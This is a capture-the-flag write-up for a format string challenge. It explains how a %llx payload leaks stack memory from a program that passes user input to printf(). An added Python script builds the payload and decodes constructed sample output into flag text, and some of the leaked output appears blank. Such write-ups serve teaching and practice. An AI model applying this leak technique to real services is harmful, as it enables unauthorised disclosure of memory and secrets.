Stonks (20)

Format string vulnerability


I decided to try something no one else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's insecure! vuln.c nc 16439


This is a format string vulnerability.

Note that user_buf is read straight from the user and then handed to printf() as its format string (the call follows the snippet below), instead of being printed through a fixed format such as "%s". Any conversion specifiers in the input are therefore interpreted by printf():

    char *user_buf = malloc(300 + 1);      /* 300 bytes of input plus a terminating NUL */
    printf("What is your API token?\n");
    scanf("%300s", user_buf);              /* reads at most 300 non-whitespace characters */
    printf("Buying stonks with token:\n"); /* user_buf is printed next, as the format string */

We will send a payload made of repeated %llx conversions (each prints an unsigned long long in hex). Every %llx makes printf() consume the next 8-byte argument it was never given: on x86-64 the first five come from the argument registers (rsi, rdx, rcx, r8, r9), and every one after that is read from the stack. Since scanf("%300s") stops at whitespace, the conversions have to be separated by a non-space character such as a dot, and the whole payload must fit in 300 characters. The output is a sequence of hex words:

We can then look for words that could be text. Bytes in the printable ASCII range (0x20 to 0x7e, which covers the letters, digits and punctuation a flag is made of) stand out from pointers and small integers; this portion looks interesting:


Each word is printed as a little-endian integer, so its least significant byte is the one that sits first in memory. To read the bytes in memory order we reverse the byte order of each word. We have:


which when converted, gives us the following string:


We are missing part of the flag, and it sits in the next word on the stack, ffa8007d65616336, which is 36 63 61 65 7d 00 a8 ff once reversed into memory order. Note the \x00 byte: that is the string terminator, so the two bytes after it are unrelated stack data. The remaining part of the flag is 6cae}.
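The whole procedure, building the %llx payload and decoding the leaked words, as an added Python example that is not part of the original writeup. The program output it parses is constructed for the example: only the word ffa8007d65616336 comes from the challenge, the other words (a pointer-looking value, a made-up xyz{demo prefix and a zero word) are invented so the decoder has something to stitch together. The assumption that the leak appears on the line right after "Buying stonks with token:" is mine, taken from the order of the printf() calls in the snippet above.

```python
"""Build a %llx leak payload and decode the leaked words back into bytes.

Added example, not code from the original writeup. SAMPLE_OUTPUT is
constructed: only ffa8007d65616336 comes from the challenge.
"""

# Constructed transcript of the program's reply. The first word looks like
# a stack pointer, the second spells the invented text "xyz{demo", the third
# is the real word quoted in the writeup and the fourth is a zero word.
SAMPLE_OUTPUT = (
    "What is your API token?\n"
    "Buying stonks with token:\n"
    "7ffd5a3c1ab0.6f6d65647b7a7978.ffa8007d65616336.0.\n"
)

WORD_SIZE = 8  # %llx consumes an 8-byte argument on x86-64


def build_payload(max_len=300, spec="%llx", sep="."):
    """Repeat the conversion as many times as fit in max_len characters.

    scanf("%300s") stops at whitespace, so the separator must not be a
    space, and anything beyond 300 characters would be left unread.
    """
    unit = spec + sep
    return unit * (max_len // len(unit))


def parse_leak(output, sep="."):
    """Pull the leaked hex words out of the program's output.

    Assumption: printf(user_buf) runs right after the
    "Buying stonks with token:" line, so the leak is the next line.
    """
    lines = output.splitlines()
    leak_line = lines[lines.index("Buying stonks with token:") + 1]
    words = [tok for tok in leak_line.split(sep) if tok]
    for tok in words:
        int(tok, 16)  # raises ValueError on anything that is not hex
    return words


def word_to_bytes(hex_word):
    """One printed %llx value -> the 8 bytes it occupied in memory.

    %llx prints no leading zeros, so "41" really is 0x0000000000000041;
    int() plus to_bytes() restores the missing high bytes. x86-64 is
    little-endian, so the number's lowest byte is the first byte in memory.
    """
    return int(hex_word, 16).to_bytes(WORD_SIZE, "little")


def decode_leak(hex_words):
    """Concatenate all words in stack order into one byte string."""
    return b"".join(word_to_bytes(w) for w in hex_words)


def printable_runs(data, min_len=4):
    """Find runs of printable ASCII (0x20..0x7e) of at least min_len bytes.

    Returns (word_index, text) pairs. A NUL or any other non-printable
    byte ends a run, which is how the terminator inside ffa8007d65616336
    cuts the text off right after "6cae}".
    """
    runs = []
    start = None
    for i, b in enumerate(data + b"\x00"):  # sentinel closes a trailing run
        if 0x20 <= b <= 0x7E:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                runs.append((start // WORD_SIZE, data[start:i].decode("ascii")))
            start = None
    return runs


if __name__ == "__main__":
    print("payload:", build_payload())
    words = parse_leak(SAMPLE_OUTPUT)
    for index, text in printable_runs(decode_leak(words)):
        print(f"word {index}: {text!r}")
```

Word indices count from the first %llx in the payload; on x86-64 the first five of those are register contents (rsi, rdx, rcx, r8, r9), so word 5 is the first one actually read from the stack. A real leak will also contain values that happen to fall in the printable range by accident, which is why the minimum run length is there; raise it or look for the flag's known prefix if the output is noisy.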

